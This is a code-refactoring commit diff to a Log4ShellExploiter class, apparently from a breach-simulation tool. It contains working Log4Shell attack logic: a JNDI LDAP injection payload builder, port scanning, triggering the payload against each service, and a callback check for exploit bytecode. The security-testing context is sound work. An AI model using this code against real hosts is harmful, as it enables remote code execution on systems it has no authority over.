Agent: remove unused upload_monkey() and rename _trigger_exploit
This commit is contained in:
parent
7bace927f8
commit
0cd6b1e616
|
@ -84,26 +84,6 @@ class Log4ShellExploiter(WebRCE):
|
||||||
# If java class was downloaded it means that victim is vulnerable
|
# If java class was downloaded it means that victim is vulnerable
|
||||||
return Log4ShellExploiter.HTTPHandler.class_downloaded
|
return Log4ShellExploiter.HTTPHandler.class_downloaded
|
||||||
|
|
||||||
def _trigger_exploit(self):
|
|
||||||
# Try to exploit all services,
|
|
||||||
# because we don't know which services are running and on which ports
|
|
||||||
open_ports = [
|
|
||||||
int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
|
|
||||||
]
|
|
||||||
for exploit in get_log4shell_service_exploiters():
|
|
||||||
for port in open_ports:
|
|
||||||
exploit.trigger_exploit(self.build_ldap_payload(), self.host, port)
|
|
||||||
|
|
||||||
# Wait for request
|
|
||||||
sleep(Log4ShellExploiter.REQUEST_TO_VICTIM_TIME)
|
|
||||||
|
|
||||||
if Log4ShellExploiter.HTTPHandler.class_downloaded:
|
|
||||||
self.exploit_info["vulnerable_service"] = {
|
|
||||||
"service_name": exploit.service_name,
|
|
||||||
"port": port,
|
|
||||||
}
|
|
||||||
return
|
|
||||||
|
|
||||||
def build_ldap_payload(self):
|
def build_ldap_payload(self):
|
||||||
interface_ip = get_interface_to_target(self.host.ip_addr)
|
interface_ip = get_interface_to_target(self.host.ip_addr)
|
||||||
return f"${{jndi:ldap://{interface_ip}:{self.ldap_port}/dn=Exploit}}"
|
return f"${{jndi:ldap://{interface_ip}:{self.ldap_port}/dn=Exploit}}"
|
||||||
|
@ -132,11 +112,25 @@ class Log4ShellExploiter(WebRCE):
|
||||||
else:
|
else:
|
||||||
return build_exploit_bytecode(exploit_command, WINDOWS_EXPLOIT_TEMPLATE_PATH)
|
return build_exploit_bytecode(exploit_command, WINDOWS_EXPLOIT_TEMPLATE_PATH)
|
||||||
|
|
||||||
def upload_monkey(self, url, commands=None):
|
|
||||||
pass
|
|
||||||
|
|
||||||
def exploit(self, url, command):
|
def exploit(self, url, command):
|
||||||
pass
|
# Try to exploit all services,
|
||||||
|
# because we don't know which services are running and on which ports
|
||||||
|
open_ports = [
|
||||||
|
int(port[0]) for port in WebRCE.get_open_service_ports(self.host, self.HTTP, ["http"])
|
||||||
|
]
|
||||||
|
for exploit in get_log4shell_service_exploiters():
|
||||||
|
for port in open_ports:
|
||||||
|
exploit.trigger_exploit(self.build_ldap_payload(), self.host, port)
|
||||||
|
|
||||||
|
# Wait for request
|
||||||
|
sleep(Log4ShellExploiter.REQUEST_TO_VICTIM_TIME)
|
||||||
|
|
||||||
|
if Log4ShellExploiter.HTTPHandler.class_downloaded:
|
||||||
|
self.exploit_info["vulnerable_service"] = {
|
||||||
|
"service_name": exploit.service_name,
|
||||||
|
"port": port,
|
||||||
|
}
|
||||||
|
return
|
||||||
|
|
||||||
class HTTPHandler(http.server.BaseHTTPRequestHandler):
|
class HTTPHandler(http.server.BaseHTTPRequestHandler):
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue